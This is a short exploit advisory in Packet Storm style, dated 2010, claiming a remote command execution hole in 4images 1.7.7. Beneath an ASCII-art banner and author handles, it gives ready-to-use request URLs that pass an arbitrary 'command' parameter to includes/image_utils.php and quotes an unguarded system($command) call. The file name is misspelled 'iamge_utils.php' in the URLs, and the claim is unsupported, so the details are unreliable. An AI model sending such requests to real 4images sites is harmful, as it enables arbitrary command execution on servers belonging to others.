4images 1.7.7 Command Execution

2010-05-14T00:00:00
ID PACKETSTORM:89501
Type packetstorm
Reporter Sniper Site Hacker
Modified 2010-05-14T00:00:00

Description

                                        
                                            `|| || | ||  
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,  
( : / (_) / ( .  
+-----------------------------------------------------------------------  
-+  
| ....... |  
| ..''xxxxxxxxxxxxxxx'... |  
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. |  
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |  
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |  
| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. |  
| .xxxxxxxxxxxxxxxxxx'... ........ .'. |  
| 'xxxxxxxxxxxxxxx'...... '. |  
| 'xxxxxxxxxxxxxx'..'x.. .x. |  
| .xxxxxxxxxxxx'...'.. ... .' |  
| 'xxxxxxxxx'.. . .. .x. |  
| xxxxxxx'. .. x. |  
| xxxx'. .... x x. |  
| 'x'. ...'xxxxxxx'. x .x. |  
| .x'. .'xxxxxxxxxxxxxx. '' .' |  
| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' |  
| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. |  
| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' |  
| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. |  
| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. |  
| .'xxxxxxx'.... ...xxxxxxx'. |  
| ..'xxxxx'.. ..xxxxx'.. |  
| ....'xx'.....''''... |  
+-----------------------------------------------------------------------  
-+  
  
Remote Command Execution Vulnerability  
========================================================================  
  
4images <= 1.7.7 (image_utils.php)  
  
#[+] Author : Sn!pEr.S!Te Hacker #  
# [+] Email : sniper-site@HoTMaiL.coM #  
# [+] T34M Sn!pEr.S!Te Hacker #  
# [+] 12-5-2010 #  
# [+] Script :4images #  
# [+] Download:http://www.4homepages.de/downloads/e0adbeb40435/4images1.7.7.zip  
# Version: [1.7.7] #  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=  
Exploit : includes/image_utils.php  
  
http://localhost/includes/iamge_utils.php?command=[your command]  
  
http://127.0.0.1/includes/iamge_utils.php?command=[your command]  
  
  
system($command);  
  
line : 104 and 125  
  
  
my friend : liar - sm Hacker -baby hacker -dmar - mr.Jld - ALhal alsab -  
  
adil - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex -  
  
`